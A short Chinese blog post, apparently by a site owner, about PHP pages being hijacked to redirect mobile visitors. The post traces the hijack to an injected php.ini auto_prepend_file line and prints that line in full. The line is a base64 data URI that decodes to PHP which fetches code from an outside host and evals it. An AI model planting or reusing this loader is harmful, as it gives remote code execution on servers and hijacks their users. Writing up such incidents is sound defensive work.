网站全部php页面顶部莫名其妙被加上了以下图片内容(红框部分),但是源码中却没有问题,该内容会导致移动端显示被劫持到sq网站

微信图片_20240508155929.png

最后排查发现是php配置文件php.ini中的auto_prepend_file =部分被添加了病毒内容,内容如下:

auto_prepend_file = "data:;base64,PD9waHAgaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCAib2ZmIik7ZXZhbCgnPz4nLmZpbGVfZ2V0X2NvbnRlbnRzKGJhc2U2NF9kZWNvZGUoJ2FIUjBjRG92THpndWFuTmpNakF5TkRRdVkyOXRPamd4TDJwell5OXFjMk11ZEhoMCcpKSk7Pz4="

该部分的内容的base64解析为以下内容:

微信图片_20240508160600.jpg

微信图片_20240508160605.jpg

可以看出解析后的内容使网站转向了一个sq网站,删除该内容问题解决;

但是未解决的是php.ini文件是如何被更改的,暂时还不清楚

标签: php, 攻击, 网站被劫持

添加新评论

阅读量:142